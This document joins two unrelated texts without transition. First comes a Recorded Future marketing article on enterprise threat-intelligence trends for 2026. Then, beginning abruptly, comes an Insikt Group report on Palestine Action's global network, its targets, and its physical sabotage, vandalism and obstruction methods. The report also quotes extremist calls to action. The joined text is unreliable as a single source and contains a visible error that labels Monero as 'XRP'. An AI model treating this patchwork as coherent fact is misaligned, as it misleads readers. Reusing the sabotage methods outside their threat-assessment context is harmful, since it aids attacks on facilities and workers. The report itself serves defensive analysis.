The cybersecurity landscape is rapidly growing in scale and complexity. Enterprises face a rising tide of sophisticated threats that cannot be contained by traditional, reactive defenses alone. With AI and automation lowering the barrier to entry for attackers exploiting new avenues, there is more opportunity than ever for disruptive, high-volume attacks.
The need for organizations to mature their threat intelligence capabilities is clear, but the road to get there isn’t always easy. Recorded Future’s 2025 State of Threat Intelligence Report found that only 49% of enterprises currently consider their threat intelligence maturity as advanced, yet 87% expect to make significant progress in the next two years.
This gap between today’s capabilities and tomorrow’s ambitions reflects a familiar challenge: organizations have plenty of threat data, but struggle to connect, automate, and operationalize it effectively across teams and tools.
Based on insights from the report, here is what enterprises can expect when it comes to threat intelligence in 2026.
Key Trends Driving Threat Intelligence Evolution
There are several key trends set to shape threat intelligence in the coming year, and organizations wanting to prioritize maturity should be on the lookout for partners that embrace and evolve with these currents in mind.
Vendor Consolidation for Unified Intelligence: Enterprises are looking to reduce tool fragmentation by consolidating threat intelligence vendors and feeds into a single platform. A unified approach promises a “single source of truth,” making it easier to operationalize intelligence across the organization.
Deeper Integration into Security Workflows: Organizations want threat intelligence deeply embedded in their existing security stack rather than as a siloed feed. In fact, 25% of enterprises plan to integrate threat intelligence with additional workflows (e.g. IAM, fraud, GRC) in the next two years to broaden their reach.
Automation and AI Augmentation: To cope with accelerating threats and volumes of data, teams are embracing automation in threat intelligence. The future lies in machine-speed analysis that automatically correlates and enriches intelligence so analysts can focus on high-level judgment.
Fusion of Internal and External Data: Over a third of organizations (36%) plan to combine external threat intelligence with data from their own environment to gain better insight into risk posture (and even benchmark against peers).
Challenges Holding Team Backs Today
Despite this forward momentum, many enterprise teams still struggle with persistent challenges that hinder their threat intelligence efforts.
Integration Gaps: Fragmented ecosystems remain a top concern. Nearly half of organizations (48%) cite poor integration with existing security tools among their biggest pain points.
Credibility and Trust Issues: Data means little if analysts don’t trust the intelligence. Half of enterprises say verifying the credibility and accuracy of threat intelligence is a major challenge.
Signal-to-Noise Overload: With huge volumes of alerts and feeds, 46% of enterprises struggle to filter relevant insight from noise. This information overload hampers visibility into real threats, drains team efficiency, and contributes to analyst burnout.
Lack of Context for Action: Even when threat data is available, 46% of organizations lack the context needed to translate it into meaningful risk insights or actionable priorities.
These barriers help explain why many programs plateau at an intermediate maturity. Teams may ingest more data sources over time, but still fall short on the automation, integration, and context needed for truly advanced, predictive intelligence.
Envisioning Threat Intelligence in 2026: Proactive, Integrated, and Business-Aligned
In the near future, leading enterprises will treat threat intelligence not as a side task but as a strategic function integrated into business processes. This means embedding threat insights directly into risk assessments, vulnerability management, and even board-level decisions on security (notably, 58% of organizations already use threat intelligence to guide business risk assessment decisions today).
Instead of simply reacting to incidents after they occur, advanced threat intelligence programs will analyze patterns and emerging trends to warn of potential attacks before they fully materialize. This doesn’t mean magically “knowing the future,” but sharpening awareness by connecting subtle signals across many sources and mapping them to one’s environment.
Human analysts will still be central for this kind of work, though their capabilities will be augmented by AI such that detection and response happen at machine speed. Intelligence platforms will automatically enrich new indicators, correlate them with ongoing events, and even trigger protective actions in real time—all with analysts overseeing the entire process.
Ultimately, a mature program in 2026 will be measured by the outcomes it enables and the risk it reduces for the organization. This means protecting the assets, uptime, and reputation the business cares about, and improving decision quality at all levels of management.
Implications for 2026 Security Budgets and Investments
As threat intelligence becomes more central to security strategy, it’s also becoming a bigger line item in budgets. In fact, 91% of organizations plan to increase their threat intelligence spending in 2026, reflecting its critical role in an era of escalating cyber threats.
One likely area for these increased funds is platform consolidation. Many teams are reevaluating their myriad point solutions and considering a move to more integrated platforms that unify multiple sources and use cases, reducing complexity and cost over time.
Another likely investment will be in automation and AI capabilities. With cyber talent scarce and alert volumes ever-increasing, it will be vital to budget for tools that automate threat intelligence workflows end-to-end. From data collection and enrichment to triage and even initial response, automation will be key to doing more with the same team.
After integrating Recorded Future into our Cyber Threat Intelligence (CTI) workflow…. We reduced detection time by 40%, from an average of 48 hours to 28 hours. Incident response efficiency improved by 30%, as automated enrichment from Recorded Future replaced manual intelligence gathering. We also identified and mitigated 25% more threats compared to the previous quarter.
Cyber Threat Intelligence Specialist, Large Enterprise Professional Services Company
Organizations should also ensure that new investments deliver contextual intelligence tailored to their business. It’s not enough to simply buy more feeds or tools that spit out data; the value lies in solutions that fuse internal data with external threat feeds and apply analytics to highlight what matters most.
That said, not every organization will have the same needs and challenges. The key to fully maximizing ROI will be aligning spending with the organization’s biggest gaps and pain points. If credibility of data is a major challenge, invest in sources with proven reliability or validation features. If integration is a key issue, focus spending on consolidation projects or appropriate vendor services.
Security teams should also establish clear metrics (such as reduced incident response time or incidents prevented) to measure the impact of threat intelligence investments. For example, over half (54%) of organizations now measure success by improved detection and response times, making it a top metric for demonstrating value delivered by threat intelligence initiatives.
Charting the Course to 2026
Enterprise threat intelligence is undoubtedly maturing and becoming more ingrained in security programs, yet much work still remains. Nearly half of organizations may call themselves “advanced” today, but truly predictive, integrated intelligence at scale is still a goalpost ahead. In looking toward 2026, security leaders should double down on the fundamentals that drive intelligence maturity: integration, automation, and alignment with business priorities.
By breaking down silos between tools and teams, trusting and acting on intelligence through improved data credibility and context, and continually measuring what works, teams can evolve from reactive defense to an anticipatory, intelligence-driven security posture.
So what are some practical next steps? First, it’s wise to benchmark your organization’s current program to identify gaps and opportunities. Tools like Recorded Future’s Threat Intelligence Maturity Assessment provide a structured way to evaluate where you stand today and get tailored recommendations on how to improve.
With that insight, you can develop a roadmap that includes the right people, process, and technology investments to operationalize threat intelligence in the most efficient way. Keep the big picture in mind: the ultimate aim is to see more threats, identify them faster, and take action to reduce risk before damage is done. With a thoughtful strategy and an eye towards these trends, organizations can chart a course from today’s challenges to a more proactive and resilient threat intelligence function in 2026 and beyond.
Palestine Action has almost certainly responded to its July 2025 designation as a terrorist organization in the United Kingdom (UK) by encouraging domestic violent extremists (DVEs) outside the UK with a nexus to the group to increase the scope and frequency of their operations, while abstaining from conducting or claiming attacks within the UK. Palestine Action’s dual-track strategy, very likely intended to maintain pressure on the multinational companies they target while avoiding complications to their legal efforts to contest the UK designation in court, almost certainly poses persistent physical threats to private and public sector facilities in Western Europe, North America, and Australia. Recent arrests of pro-Palestine Action protesters in the UK and events in the Israel-Hamas conflict have very likely prompted Palestine Action’s global network to more frequently conduct militant direct actions on behalf of Palestine Action’s interests.
Palestine Action’s global network consists of pro-Palestinian activist groups that share the UK branch’s commitment to militant direct action and other core aspects of the group’s operational profile — such as motivating ideologies, preferred targets, area(s) of operation, or tactics, techniques, and procedures (TTPs). The most popular TTPs within the network are almost certainly those that Palestine Action’s UK branch has promoted or employed, including vandalizing the exterior of facilities with red paint or blunt instruments, obstructing facilities with “human chains” or large objects, and sabotaging valuable assets inside the perimeter of a facility. Defense contractors that provide services to Israel’s government or military are almost certainly the primary target of the Palestine Action global network, although the network has also frequently targeted insurance agencies, banks and financial entities, and shipping companies.
Key Findings
Palestine Action’s July 2025 terrorism designation in the UK very likely broadened the geographic scope of its operations and potential targets, as activist groups in its global network outside the UK almost certainly have greater freedom of maneuver.
Since October 7, 2023, events in the Israel-Hamas conflict, especially expansions of Israeli military activity or reports of humanitarian crises in the Gaza Strip, have prefigured physical attacks with a nexus to Palestine Action.
The facilities of Western European, North American, and Australian defense contractors, banks, insurance companies, international shipping and logistics service providers, and government agencies — particularly those with a perceived relationship to Israel — very likely face elevated physical risks from Palestine Action’s global network.
The most costly Palestine Action operations — some of which have caused several million dollars in damages to targeted organizations — very likely resulted from Palestine Action operatives breaching facilities’ secure perimeters.
In the short to medium term, Palestine Action militant direct action in the UK is very likely to maintain a lower operational tempo until the group either succeeds in its effort to rescind its terrorism designation or exhausts all legal avenues to do so.
Palestine Action: History and Terrorism Designation
Palestine Action was founded in the UK in July 2020 by Huda Ammori and Richard Loxton-Barnard, longtime UK-based activists in the pro-Palestinian and environmental movements, respectively. The almost certain core purpose of Palestine Action is to promote militant direct action by pro-Palestinian activists around the world, particularly those who aim to disrupt the operations of government agencies, defense contractors, and private companies that supply Israel or the Israel Defense Forces (IDF). Historically, the group’s UK core has focused its efforts on targeting the Israeli multinational defense contractor Elbit Systems (Elbit), as well as its partners and subsidiaries. Like other domestic violent extremist (DVE) groups, Palestine Action and its individual global network groups very likely lack formal hierarchies, opting instead to function in the form of decentralized activist cells.
Palestine Action very likely distinguishes between elements of the organization that focus on non-violent direct actions — such as protests, demonstrations, and political activity — and the organization’s covert cells dedicated to militant direct action. On August 2, 2023, the group announced the creation of “Palestine Action Underground,” its label for the group’s “covert missions,” and stated that its future militant direct actions would target “any business found to be collaborating with Elbit via their research, technology, consultation, labour, components, or any other service.” A March 2025 unclassified intelligence assessment from the UK’s Joint Terrorism Assessment Center (JTAC) reported that between July 2020 and March 2025, Palestine Action “conducted over 385 direct actions” in the UK, including both non-violent and militant direct actions. These actions have occurred throughout the UK, supporting JTAC’s assessment that the group has cells throughout the country, but police in the UK have reported higher degrees of Palestine Action-related activity in Greater London, as well as “Staffordshire, Greater Manchester, Leicestershire, Metropolitan, Kent, and Avon and Somerset.”
The frequency and scope of Palestine Action’s operations in the UK almost certainly increased following the October 7, 2023, Hamas attack in Israel and the subsequent Israel-Hamas war in the Gaza Strip. Figure 1 (below) shows references in the Recorded Future Intelligence Operations Platform to incidents of sabotage or vandalism in the UK involving Palestine Action between its 2020 founding and 2025 terrorism designation, annotated with significant events during the post-October 2023 Israel-Hamas conflict. In many instances, Palestine Action’s operations followed major developments in this conflict, such as expansions of Israeli military activity in the Gaza Strip or elsewhere in the Middle East, reports of humanitarian crises in Gaza, or the deaths of senior Hamas, Palestinian Islamic Jihad (PIJ), or Hezbollah figures in targeted airstrikes.
Figure 1: References to Palestine Action operations in the UK in the Recorded Future Intelligence Operations Platform alongside key developments in the Israel-Hamas conflict (Source: Recorded Future)
The culmination of Palestine Action’s direct action campaign in the UK was a June 20, 2025, operation in which several of the group’s members illegally breached the Royal Air Force (RAF) Brize Norton base in Oxfordshire, sprayed paint into the engines of two RAF Airbus A330 Multi Role Tanker Transport (MRTT) aerial refueling aircraft, and damaged the jets with crowbars. In total, the attack caused over seven million pounds ($9.5 million) in damages and prompted calls for UK law enforcement agencies to crack down on Palestine Action. Three days after the attack, UK Home Secretary Yvette Cooper announced the Home Office’s intent to proscribe Palestine Action under the UK’s Terrorism Act 2000. The UK Parliament approved the proscription with votes on July 2 and 3, 2025, and Palestine Action was officially designated a terrorist organization in the UK on July 5; this status prohibits individuals from joining, fundraising, or expressing support for Palestine Action, with legal penalties as severe as fourteen years in prison for being convicted of being a Palestine Action member.
Palestine Action has almost certainly pursued a dual-track strategy in response to its designation in the UK, abstaining from major sabotage operations in the UK while inciting its global network to conduct these operations outside of the country. Insikt Group is not aware of significant incidents of sabotage connected to Palestine Action in the UK since its proscription. Instead, the group has attempted to legally challenge the ban and garner public support for its cause through a series of unlawful (due to Palestine Action’s proscription) but well-attended protests in which several thousand demonstrators have been arrested for expressing support for Palestine Action.
However, the organization’s international network outside the UK has almost certainly taken responsibility for Palestine Action’s direct action campaigns, targeting defense contractors, militaries, and other industries perceived to be supporting Israel with sabotage, vandalism, and other disruptive physical threat activities despite the UK terrorism designation. In August 2025, Palestine Action’s official website deleted all of its content and posted a statement (Figure 2) claiming that “the website has been transferred to others in the global movement who are not active in Britain or British nationals.” The website now provides two ways for individuals to contribute to the organization: through its Monero (XRP) cryptocurrency wallet or through the website of its Italian franchise, Palestine Action Italia (also known as Palestina Libera). On September 8, 2025, a Palestine Action Global social media account began posting and announced the launch of the “Palestine Action Global” platform, indicating the organization’s belief that “Palestine Action is a global network taking direct action against the Israeli war machine.”
Figure 2:Statement on Palestine Action website with cryptocurrency wallet information and link to Italian franchise (Source: Palestine Action)
Groups in Palestine Action’s network in North America, Europe, and Australia — as detailed below — are very likely to increase their operational tempo in response to the UK proscription of Palestine Action and ongoing developments in the Israel-Hamas conflict. In the short term, the frequency of direct action conducted by groups in Palestine Action’s global network is likely to outpace the parent organization in the UK, as it is likely to continue its de facto moratorium on sabotage and vandalism while it attempts to legally appeal its proscription. Nevertheless, Palestine Action will very likely attempt to continue providing support to its international network through organizing trainings for activists, sharing instructional material, and using its platform to advertise the activities of the network around the world.
Palestine Action’s Tactics, Techniques, Procedures, and Targets
Palestine Action’s UK branch and its global network almost certainly rely on standard operating procedures for conducting attacks against facilities to disrupt the business operations of their intended targets. Specifically, DVEs associated with the group almost certainly prefer TTPs for attacks that are described in Palestine Action’s 2023 instructional guide to carrying out militant direct actions in support of the group’s objectives. Namely, Palestine Action and its global network have frequently and repeatedly used the same vandalism, physical obstruction, and sabotage TTPs in operations, as described in the following section. DVEs with a nexus to Palestine Action very likely select which TTP to employ in operations based on their level of access to the targeted facility in question, conducting more destructive and sophisticated attacks when they are able to gain interior access.
Across the globe, Palestine Action and similar groups’ almost certainly primary targets are the offices of defense contractors that have perceived relationships with the IDF or the Israeli government. In the UK and Western Europe, Elbit and its subsidiaries and partners have been most frequently targeted in Palestine Action attacks. However, due to the global footprint of Palestine Action’s network and the expansion of the Israel-Hamas conflict since October 2023, Palestine Action and similar groups have also attacked entities in other sectors that are perceived to be doing business with the IDF, the Israeli government, or Elbit. Aside from defense contractors and governments, the most frequently targeted industry sectors are insurance, banks and financing, logistics, and shipping.
Direct Action TTPs
Palestine Action almost certainly uses physical attack TTPs that are intended to maximize the degree of economic disruption and damage to targeted facilities, but minimize the risks of harm to individuals and detection by law enforcement. By imposing financial cost on targeted companies during operations, Palestine Action almost certainly seeks to convince the targeted entity to sever its relationships with the IDF or Israeli government. Insikt Group associates the following overarching TTPs with attacks perpetrated by Palestine Action or its global network:
Palestine Action operations are typically carried out by small cells, mostly consisting of fewer than five activists.
Palestine Action conducts targeted operations against facilities outside of business hours to maintain operational security and minimize the risks of harm to personnel or the identification/detection of its operatives.
Palestine Action operations aim to impose substantial financial costs to targeted entities through rudimentary, low-sophistication methods.
Palestine Action operatives prefer vandalism, obstruction, and sabotage as TTPs; which TTP is selected is very likely contingent on the degree of access to the facility.
If operatives cannot gain entry to the facility, they will very likely prefer to vandalize the exterior of the facility or attempt to block external entry.
If operatives are able to gain internal access to the facility — usually by identifying and exploiting potential access points during pre-attack reconnaissance or by using physical force to enter — they will very likely attempt to sabotage infrastructure inside the facility.
Vandalism
Almost all observed Palestine Action operations involve vandalism of the exterior of targeted facilities, with two types of actions especially prominent. First, DVEs affiliated with Palestine Action have frequently used red spray paint to either indiscriminately color or write messages on the facades of targeted facilities, or, by dispersing paint through a fire extinguisher, blanketing the exterior or interior of a facility with red paint. Second, these DVEs use tools or projectiles, including hammers, crowbars, blunt objects, and bricks, to destroy windows on the exterior of targeted buildings.
These vandalism methods are each attested to in Palestine Action’s official instructional guide as effective ways to “destrupt [sic], damage or destroy your target.” The manual also recommends that DVEs use the same vandalism TTPs to damage exterior surveillance systems in order to avoid detection during direct actions, or to destroy infrastructure such as air conditioning systems or pipes outside the facility to “sabotage the profits of your target even further.”
Figure 3: Evidence of vandalism TTPs from a February 2025 Palestine Action attack against an Allianz insurance office in Milton Keynes, UK (Source: Palestine Action)
Obstruction
Palestine Action operations have also used physical obstruction as a TTP to prevent access to targeted facilities. Unlike other attack TTPs associated with Palestine Action, the group has often used methods of obstructing facilities that are very unlikely intended to maintain the covert nature of the operation. Specifically, in some operations, Palestine Action cells have physically obstructed access to targeted facilities by forming a human blockade: sitting down, interlocking arms, blocking access to a main doorway, and on occasion chaining themselves together or to an immovable object (such as a vehicle or post). In a break from the patterns of other observed Palestine Action TTPs, activists have attempted blockades during normal business hours, mainly to prevent facility employees from entering the premises.
Figure 4:Palestine Action activists blockade a Lockheed Martin facility in Bedfordshire, UK, in a November 2023 protest (Source:BBC)
Palestine Action network groups — particularly in the United States (US) — have also experimented with more novel methods of facility obstruction that can be covertly conducted. Cells with a nexus to the US-based Palestine Action offshoot Unity of Fields (UoF), for instance, launched a campaign in the summer and fall of 2024 to target Citibank automated teller machine (ATM) locations in the New York and Los Angeles metropolitan areas due to the bank’s perceived support of Israeli interests. In addition to vandalizing the facilities, the cells inserted epoxy and affixed cement-glue stickers to exterior card-reader devices that were necessary to enter the facilities. Palestine Action’s instructional guide also calls for activists to use concrete to plug water or sewage pipes leading to targeted facilities, although Insikt Group has not observed Palestine Action operatives using this TTP.
Figure 5:Activists insert epoxy into a Citibank card reader in New York City on October 7, 2024 (Source: Unity of Fields)
Sabotage
Sabotage operations remain the most likely of the TTPs historically employed by Palestine Action to impose serious financial costs on the victims of its operations. While almost certainly relying on low-tech and low-sophistication methods, Palestine Action has caused millions of dollars in damages through sabotage operations, mainly to technology and other assets inside targeted facilities. In previous incidents, cells linked to Palestine Action have relied on the same toolkit used for vandalism and obstruction — large, blunt objects like crowbars and wrenches and fire extinguishers filled with paint — to sabotage their target. Activists almost certainly prefer these tools due to their low cost, ease of use, minimal profile, and the inability to trace their purchase; their use across the spectrum of Palestine Action’s TTPs likely suggests that activists are opportunistic, employing the toolkit in sabotage operations as opposed to vandalism or obstruction when they can exploit vulnerabilities in facility security.
The most notable and recent sabotage incident connected to Palestine Action was the aforementioned breach of RAF Brize Norton, the largest RAF base in the UK, on June 20, 2025. A video of this attack posted by the group shows activists approaching Airbus A330s on the base using electric scooters. They damaged the aircraft by spraying red paint through a fire extinguisher directly into the plane’s engines and striking the plane with crowbars. The attack caused approximately £7 million ($9.4 million) in damages to the aircraft, almost certainly due to the impact of the attack on sensitive parts and equipment inside the planes’ engines. The attack on RAF Brize Norton led to the arrest and indictment of five Palestine Action-linked activists and almost certainly prompted the UK terrorism designation of the group, as well as improvements to facility and perimeter security at the RAF base.
Figure 6:Palestine Action activists approach aircraft at RAF Brize Norton on electric scooters (Source: Palestine Action)
Palestine Action activists also deployed sabotage TTPs on several additional operations targeting defense contractors in the UK. In August 2024, a Palestine Action cell in Bristol breached an Elbit warehouse by piloting a van through perimeter fencing, entered the facility, and began sabotaging internal equipment within the facility with sledgehammers, axes, and other blunt instruments. In total, the operation caused over £1 million ($1.3 million) in damages; protesters also allegedly assaulted a security guard and law enforcement officers responding to the incident, prompting JTAC to label the attack as an “act of terrorism.” During a June 1, 2022, incident at a Thales Group facility in Glasgow, Palestine Action activists accessed the roof and entered the facility, destroying parts used for submarines with blunt instruments. In conjunction with the sabotage operation, two protesters glued themselves to the roof, likely attempting to obstruct access to the facility.
Targets
Palestine Action’s primary target in the UK has almost certainly been Elbit: the global defense contractor has been the most frequent victim of its attacks, the group’s propaganda and instructional material list Elbit as the group’s preferred target, and Palestine Action has launched branded campaigns designed specifically to encourage activists to attack Elbit facilities. As secondary targets, the group has conducted notable attacks against other public and private sector defense entities perceived to have some association with the Israeli military, namely the UK’s Ministry of Defence (MoD), Teledyne Technologies, Thales Group, Leonardo, and Rafael Advanced Defense Systems. According to its 2023 announcement and its post-October 7, 2023, activity, the group and its international network consider a range of entities in sectors that reportedly supply goods or services to Elbit or the Israeli military — including banks, financial institutions, insurance agencies, real estate brokers, accounting firms, human resources contractors, and international shipping and logistics companies — as legitimate targets for militant direct action. Direct actions have also targeted other UK government entities, including the UK Foreign and Commonwealth Office, the BBC, and the London Stock Exchange. Palestine Action almost certainly targets these companies with the goal of inflicting maximum financial and reputational damage through its operations, in order to convince companies to cease their business with Elbit or Israeli entities.
As the next section demonstrates, the international expansion of Palestine Action network groups adopting the UK branch’s modus operandi or TTPs has almost certainly broadened the range of secondary and tertiary targets that are likely to be affected by militant direct action campaigns. However, Palestine Action and its global network very likely share a focus on specific sectors — defense contracting, banking, insurance, and international shipping and logistics — that relevant groups and cells are likely to target regardless of their respective area of operations. Moreover, the TTPs Insikt Group associates with Palestine Action’s UK branch have almost certainly been adopted by its international counterparts, very likely due to the influence of Palestine Action’s militant direct action campaigns in the UK, instructional material, and training sessions for activists.
Palestine Action’s Global Network
Palestine Action’s global network consists of groups of activists around the world who share Palestine Action UK’s commitment to disrupting the normal business operations of entities partnered with the State of Israel through militant direct action. Some of these groups refer or have referred to themselves explicitly as “Palestine Action”; have direct relationships to the UK branch through their members, partners, or benefactors; choose identical targets, such as Elbit; or, like Palestine Action UK, are solely motivated by the anti-Israel cause. Others, despite lacking these relationships, have directly appropriated Palestine Action UK’s TTPs, targets, or other aspects of the organization to support their own operations.
We classify groups in Palestine Action’s global network based on which elements they share in common with the UK branch. As depicted in Table 1, our four-part classification labels Palestine Action network groups as either Palestine Action franchises, affiliates, offshoots, or partners, depending on whether they share areas of operation, motivating ideology, TTPs, or targets with the UK branch. These categories are not static and are subject to change over time, particularly as groups founded as Palestine Action franchises outside the UK adapt to the local landscape in their own countries and form their own brand. Table 1 additionally contains examples of each of the four categories of Palestine Action network groups, with the following subsections containing case studies of particularly notable franchise, affiliate, offshoot, and partner groups.
Unity of Fields (US), Shut Elbit Down (Germany/Austria)
Partner
Area of operation, TTPs
Ideology, targets
Shut the System (UK)
Table 1:Classification of Palestine Action global network groups (Source: Insikt Group)
Franchise: Palestine Action Italia/Palestina Libera (Italy)
Figure 7:Palestine Action Italia logo (Source: Palestine Action Italia)
Palestine Action Italia, more commonly known as Palestina Libera, is Palestine Action’s Italy-based franchise. On its website, the group directly identifies itself as “the Italian branch of the international ‘Palestine Action’ campaign, which in England directly led to the closure of three arms factories involved in the genocide in Gaza.” The group also uses similar branding as the UK branch, employs similar TTPs, and targets the same sectors, focusing largely on defense contractors with facilities in Italy. In particular, Palestina Libera’s direct actions have frequently targeted the Italy-based defense contractor Leonardo at its offices throughout the country, due to its joint ventures with Elbit.
The organization very likely emerged from pro-Palestinian activist factions in Italy that increasingly aligned with Palestine Action’s global network in the wake of the October 7, 2023, attack. While data in the Recorded Future Platform indicates the group’s website was registered on February 4, 2024, a 2008 issue of al-Majdal Magazine — the quarterly publication of the BADIL Resource Center for Palestinian Residency & Refugee Rights — indicates that the same domain was operated by an Italian pro-Palestinian organization, the Comitato di Solidarietà con il Popolo Palestinese, Torino [Committee for Solidarity with the Palestinian People in Turin, Italy]. Screenshots of the domain captured in the Wayback Machine indicate that between October 2010 and the website’s registration in February 2024, the site displayed a message indicating the administrator should “upload [their] website into the public_html directory.” This message almost certainly indicates that an administrator account was active during the interim, but that it had not uploaded any information onto the domain. The group’s active social media accounts were created in November and December 2023, respectively.
Following Palestine Action’s July 5, 2025, designation as a terrorist organization in the UK, Palestine Action Italia has likely become one of the organization’s most prioritized franchises. Palestine Action’s main website currently includes a link to donate to Palestina Libera, hosted on Palestina Libera’s website. This donation section uses the service provider Donorbox to facilitate transactions, with options for donors including sending €15 for “a little bit of paint,” €50 for “smoke bombs in action,” €100 for the “legal expenses fund,” or another amount determined by the donor. Palestina Libera has also very likely increased its operational tempo in the wake of the proscription, citing Palestine Action UK’s designation and the arrests of protesters at rallies in the UK as motivation for new direct actions. For instance:
On October 3, 2025, Palestina Libera took part in pro-Palestine direct actions across Italy, protesting the Israeli government’s interception of the Global Sumud Flotilla. Activists very likely affiliated with Palestina Libera participated in occupations and blockades of major transportation and logistics infrastructure, including obstructing a runway at Pisa International Airport, occupying several highways in the Tuscany region, and blockading an Amazon Logistics facility in Brandizzo.
On September 29, 2025, the group claimed to have blockaded a Leonardo facility in the town of Nerviano. In a social media post, it alleged that at least one Leonardo employee working at the facility joined its protest.
On September 25, 2025, several of the group’s activists chained themselves together outside a Rheinmetall facility in Rome, which they claimed “hindered production” and “made the gate inaccessible for an entire work shift.”
“Death to Toll” is a campaign by anarchist violent extremists (AVEs) in Australia to conduct vandalism, obstruction, and sabotage against the Australian international logistics and shipping company Toll Group (Toll), its parent organization Japan Post Holdings, and defense contractors working with the Australian Defense Force (ADF), due to accusations that Toll and the ADF are partnering with the Israeli military. The group responsible for this campaign is classified as a Palestine Action affiliate, as it almost certainly shares Palestine Action UK’s ideology and uses TTPs promoted by the group, but operates solely in the Melbourne, Australia area and has chosen its own companies to target.
The first attack claimed by this group was a sabotage of a Heat Treatment Australia (HTA) facility on October 14, 2024; the campaign against Toll began with an obstruction of one of the company’s facilities in Melbourne on November 22, 2024. In an August 7, 2025, interview, Death to Toll’s organizers cited Palestine Action’s targeting of UK shipping organizations that partnered with Elbit as an inspiration for their attacks. They also have shared a copy of Palestine Action’s 2023 instructional guide on their website.
In recent months, the Death to Toll group has claimed responsibility for several acts of vandalism, obstruction, and sabotage targeting Toll:
On October 7, 2025, AVEs claimed responsibility for intercepting a Toll fuel truck in Melbourne by obstructing a road with flaming objects. They subsequently spraypainted the truck with red graffiti.
On August 31, 2025, AVEs claimed to have attacked a Toll facility in Dandenong South. A video posted to the group’s Instagram account shows activists smashing exterior glass doors of the facility with a blunt object and dousing them with a flammable liquid in a bottle, very likely gasoline.
On August 11, 2025, AVEs claimed to have vandalized a Toll facility in Truganina, writing graffiti, spraying red paint, and damaging keycard access devices on the exterior of the facility. Toll confirmed the attack in a statement to the press, and Victoria Police indicated they were investigating the incident.
Beyond its website, the Death to Toll campaign operates a social media account and accepts submissions from independent AVEs for claims of responsibility and tips on potentially vulnerable facilities on a Mega file-sharing site and through a Proton Mail email address. The social media pages attributed to the group have frequently used the hashtags #socalledaustralia, #DeathToll, and #TheDeathTollisRising. On the front page of their website, the administrators have posted a call to action against industries in Australia that they perceive to be providing support for the IDF. Specifically, they claim that “all sites and equipment used or owned by Toll Holdings and its parent company, Japan Post, are legitimate targets for anti-genocide action. This includes sabotage, vandalism, blockades, strikes, occupations, and all forms of resistance and disruption. Everything is on the table.”
Offshoot: Unity of Fields (United States)
Figure 9:Unity of Fields logo (Source:Social Media)
Unity of Fields (UoF) describes itself as an “anti-imperialist propaganda front” that reports on the activities of militant pro-Palestinian activists in the US. In this regard, it functions in a similar fashion to AVE “counter-info” outlets, which provide AVEs in a specified geographic area with information pertaining to upcoming protests and demonstrations, claims of responsibility for AVE attacks, guides and instructional material for carrying out attacks, and communiqués from local AVE groups.
UoF was almost certainly founded as a Palestine Action franchise in the US: during its initial years of operation, it used the name “Palestine Action US,” was managed by a cell of activists who almost certainly founded the group with insight from Palestine Action UK members, and devoted itself to attacking Elbit facilities in the US using Palestine Action’s standard TTPs.
From October 7, 2023, to August 2024, Palestine Action US predominantly conducted vandalism, obstruction, and sabotage against Elbit facilities, particularly in Cambridge, Massachusetts, and Merrimack, New Hampshire. Calla Walsh — almost certainly one of Palestine Action US and UoF’s de facto leaders between October 2023 and July 2025 — was arrested and convicted for her role in a November 20, 2023, Palestine Action US attack on an Elbit facility in Merrimack.
In August 2024, following Walsh’s release from prison, Palestine Action US announced its rebranding as “Unity of Fields”, appropriating a concept from the Yemeni Houthi movement. The group subsequently renamed its social media and online messenger accounts, launched a new website dedicated to the group’s communiqués and instructional materials, and claimed the group’s new mission was to establish “a militant propaganda front against the US-NATO-zionist axis of imperialism.” In addition to claims of responsibility for attacks, the website also hosts a repository of instructional and ideological material, as well as publications produced by other AVE groups.
Autonomous pro-Palestinian activists across the US have sent several dozen claims of responsibility to UoF for publication claiming responsibility for operations against an array of targets, including defense contractors (including Magellan Aerospace, Rolls-Royce and MTU America, Lockheed Martin, Ghost Robotics Corporation, Leidos, and Israel Chemicals), banks (including Bank of America, Citibank, Wells Fargo, Chase Bank, and BNY Mellon), shipping and logistics companies (including Maersk and Amazon), US military recruitment centers, law enforcement infrastructure (particularly vehicles), university buildings and officials, public transportation, and construction buildings and equipment. Occasionally, DVEs from outside of the US — including other Palestine Action global network groups — send communiqués to UoF for publication. At the time of writing, the most recent claims of responsibility include:
An August 7, 2025, communiqué claiming responsibility for an arson of several vehicles at a Lovitt Technologies plant in Melbourne, Australia
A May 29, 2025, communiqué claiming responsibility for spraypainting several pro-Palestinian messages on a Maersk shipping container in Oakland, California
A May 9, 2025, communiqué from protesters at the University of Washington that details the occupation of a university building
UoF has significantly decreased its output of new claims of responsibility since late July 2025, very likely because of internal disputes and a leadership transition within the group. On July 29, 2025, Calla Walsh reported on social media that she was “no longer part of” UoF after a dispute over the “direction in which the project is going,” following which Walsh reported “the organization purged me” and that she had “complied with the decision and transferred them ownership of the accounts.” While Insikt Group is unaware of the exact nature of this dispute, Walsh’s departure from UoF directly followed a July 2025 trip she made to Iran, where she participated in an event hosted by the World Service of the Islamic Republic of Iran Broadcasting (IRIB), Iran’s government-operated media agency. In an October 5, 2025, article on her Substack page, Walsh reported that she had been detained by US Customs and Border Protection (CBP) officers at New York’s John F. Kennedy International Airport following her return from Tehran.
Partner: Shut the System (United Kingdom)
Figure 10:Shut the System logo (Source:Social Media)
Unlike other groups included in this report, which are predominantly motivated by the Palestinian cause, Shut the System is a UK-based environmental violent extremist (EVE) group that likely emerged as an offshoot of the UK climate activist group Extinction Rebellion (XR). However, the group has also almost certainly conducted pro-Palestinian direct actions. In addition, Shut the System has also directly collaborated with Palestine Action in the UK, almost certainly due to substantial overlaps between Palestine Action’s and Shut the System’s TTPs, preferred targets, and areas of operation. For instance, Shut the System frequently targets insurers and banks that it claims provide services to major global fossil fuel extraction projects; Palestine Action has also targeted many of the same companies on the grounds that they provide services to the IDF or Israeli government. Both groups also frequently use vandalism with red paint, projectiles, or blunt objects to deface the facade of target properties, as well as sabotage, although Shut the System has very likely deployed more sophisticated methods of infrastructure sabotage than Palestine Action. Overall, Shut the System fits the profile of a Palestine Action partner organization.
